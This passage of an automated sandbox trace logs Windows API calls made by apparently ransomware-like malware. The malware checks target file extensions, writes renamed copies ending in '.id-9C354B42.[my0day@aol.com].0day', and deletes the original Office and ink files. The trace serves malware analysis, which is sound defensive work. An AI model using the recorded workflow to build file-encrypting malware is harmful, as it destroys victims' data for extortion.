"c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0x20 [0266.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.700] lstrlenW (lpString=".doc") returned 4 [0266.700] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.700] lstrlenW (lpString=".docx") returned 5 [0266.700] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0266.701] lstrlenW (lpString=".pdf") returned 4 [0266.701] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString=".xls") returned 4 [0266.701] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString=".xlsx") returned 5 [0266.701] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0266.701] lstrlenW (lpString=".ppt") returned 4 [0266.701] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.701] lstrlenW (lpString=".zip") returned 4 [0266.701] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.701] lstrlenW (lpString=".rar") returned 4 [0266.701] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString=".bz2") returned 4 [0266.701] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString=".7z") returned 3 [0266.701] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.701] lstrlenW (lpString=".dbf") returned 4 [0266.701] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.701] lstrlenW (lpString=".1cd") returned 4 [0266.701] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.701] lstrlenW (lpString=".jpg") returned 4 [0266.701] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.701] lstrlenW (lpString=".doc") returned 4 [0266.701] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.701] lstrlenW (lpString=".docx") returned 5 [0266.701] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0266.701] lstrlenW (lpString=".pdf") returned 4 [0266.701] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.702] lstrlenW (lpString=".xls") returned 4 [0266.702] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.702] lstrlenW (lpString=".xlsx") returned 5 [0266.702] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0266.702] lstrlenW (lpString=".ppt") returned 4 [0266.702] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.702] lstrlenW (lpString=".zip") returned 4 [0266.702] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.702] lstrlenW (lpString=".rar") returned 4 [0266.702] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.702] lstrlenW (lpString=".bz2") returned 4 [0266.702] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.702] lstrlenW (lpString=".7z") returned 3 [0266.702] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.702] lstrlenW (lpString=".dbf") returned 4 [0266.702] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.702] lstrlenW (lpString=".1cd") returned 4 [0266.702] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0266.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0266.702] lstrlenW (lpString=".jpg") returned 4 [0266.702] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.702] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.702] lstrlenW (lpString="base_heb.xml") returned 12 [0266.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0266.703] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=738) returned 1 [0266.703] CloseHandle (hObject=0x2f0) returned 1 [0266.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0x20 [0266.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0266.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0266.703] lstrlenW (lpString=".doc") returned 4 [0266.703] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.703] lstrlenW (lpString=".docx") returned 5 [0266.703] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0266.704] lstrlenW (lpString=".pdf") returned 4 [0266.704] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.704] lstrlenW (lpString=".xls") returned 4 [0266.704] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.704] lstrlenW (lpString=".xlsx") returned 5 [0266.704] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0266.704] lstrlenW (lpString=".ppt") returned 4 [0266.704] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0266.704] lstrlenW (lpString=".zip") returned 4 [0266.704] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.704] lstrlenW (lpString=".rar") returned 4 [0266.704] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.704] lstrlenW (lpString=".bz2") returned 4 [0266.704] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.704] lstrlenW (lpString=".7z") returned 3 [0266.704] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0266.704] lstrlenW (lpString=".dbf") returned 4 [0266.704] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0269.274] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.274] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.275] GetLastError () returned 0x0 [0269.276] ReadFile (in: hFile=0x2c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xf92, lpOverlapped=0x0) returned 1 [0269.305] WriteFile (in: hFile=0x2cc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xfa0, lpOverlapped=0x0) returned 1 [0269.307] ReadFile (in: hFile=0x2c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.307] WriteFile (in: hFile=0x2cc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.307] SetEndOfFile (hFile=0x2cc) returned 1 [0269.307] CloseHandle (hObject=0x2cc) returned 1 [0269.307] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.307] SetEndOfFile (hFile=0x2c4) returned 1 [0269.310] CloseHandle (hObject=0x2c4) returned 1 [0269.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.310] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf")) returned 1 [0269.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.310] lstrlenW (lpString=".doc") returned 4 [0269.310] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.310] lstrlenW (lpString=".docx") returned 5 [0269.310] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.310] lstrlenW (lpString=".pdf") returned 4 [0269.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.310] lstrlenW (lpString=".xls") returned 4 [0269.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.310] lstrlenW (lpString=".xlsx") returned 5 [0269.310] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.310] lstrlenW (lpString=".ppt") returned 4 [0269.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.310] lstrlenW (lpString=".zip") returned 4 [0269.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.311] lstrlenW (lpString=".rar") returned 4 [0269.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".bz2") returned 4 [0269.311] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".7z") returned 3 [0269.311] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.311] lstrlenW (lpString=".dbf") returned 4 [0269.311] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.311] lstrlenW (lpString=".1cd") returned 4 [0269.311] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.311] lstrlenW (lpString=".jpg") returned 4 [0269.311] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.311] lstrlenW (lpString=".doc") returned 4 [0269.311] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".docx") returned 5 [0269.311] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.311] lstrlenW (lpString=".pdf") returned 4 [0269.311] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".xls") returned 4 [0269.311] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.311] lstrlenW (lpString=".xlsx") returned 5 [0269.311] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.311] lstrlenW (lpString=".ppt") returned 4 [0269.311] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.311] lstrlenW (lpString=".zip") returned 4 [0269.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.311] lstrlenW (lpString=".rar") returned 4 [0269.312] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString=".bz2") returned 4 [0269.312] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString=".7z") returned 3 [0269.312] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.312] lstrlenW (lpString=".dbf") returned 4 [0269.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.312] lstrlenW (lpString=".1cd") returned 4 [0269.312] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 63 [0269.312] lstrlenW (lpString=".jpg") returned 4 [0269.312] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.312] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.312] lstrlenW (lpString="BL00252_.WMF") returned 12 [0269.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.313] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=4708) returned 1 [0269.313] CloseHandle (hObject=0x2c4) returned 1 [0269.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf")) returned 0x20 [0269.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.313] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.313] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0269.314] GetLastError () returned 0x0 [0269.314] ReadFile (in: hFile=0x2c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x1264, lpOverlapped=0x0) returned 1 [0269.324] WriteFile (in: hFile=0x2cc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x1270, lpOverlapped=0x0) returned 1 [0269.325] ReadFile (in: hFile=0x2c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0269.325] WriteFile (in: hFile=0x2cc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.325] SetEndOfFile (hFile=0x2cc) returned 1 [0269.342] CloseHandle (hObject=0x2cc) returned 1 [0269.354] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.354] SetEndOfFile (hFile=0x2c4) returned 1 [0269.357] CloseHandle (hObject=0x2c4) returned 1 [0269.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.358] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf")) returned 1 [0269.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.358] lstrlenW (lpString=".doc") returned 4 [0269.358] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.358] lstrlenW (lpString=".docx") returned 5 [0269.358] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.358] lstrlenW (lpString=".pdf") returned 4 [0269.358] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.358] lstrlenW (lpString=".xls") returned 4 [0269.358] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.358] lstrlenW (lpString=".xlsx") returned 5 [0269.358] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.358] lstrlenW (lpString=".ppt") returned 4 [0269.358] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.358] lstrlenW (lpString=".zip") returned 4 [0269.358] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.358] lstrlenW (lpString=".rar") returned 4 [0269.358] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.358] lstrlenW (lpString=".bz2") returned 4 [0269.358] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.358] lstrlenW (lpString=".7z") returned 3 [0269.358] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.359] lstrlenW (lpString=".dbf") returned 4 [0269.359] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.359] lstrlenW (lpString=".1cd") returned 4 [0269.359] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.359] lstrlenW (lpString=".jpg") returned 4 [0269.359] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.359] lstrlenW (lpString=".doc") returned 4 [0269.359] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString=".docx") returned 5 [0269.359] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.359] lstrlenW (lpString=".pdf") returned 4 [0269.359] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString=".xls") returned 4 [0269.359] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.359] lstrlenW (lpString=".xlsx") returned 5 [0269.359] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.359] lstrlenW (lpString=".ppt") returned 4 [0269.359] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.359] lstrlenW (lpString=".zip") returned 4 [0269.359] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.359] lstrlenW (lpString=".rar") returned 4 [0269.359] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.359] lstrlenW (lpString=".bz2") returned 4 [0269.360] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString=".7z") returned 3 [0269.360] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.360] lstrlenW (lpString=".dbf") returned 4 [0269.360] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.360] lstrlenW (lpString=".1cd") returned 4 [0269.360] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0269.360] lstrlenW (lpString=".jpg") returned 4 [0269.360] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.360] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.360] lstrlenW (lpString="BL00261_.WMF") returned 12 [0269.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.477] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=12482) returned 1 [0269.477] CloseHandle (hObject=0x354) returned 1 [0269.477] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf")) returned 0x20 [0269.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.660] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.660] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0269.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 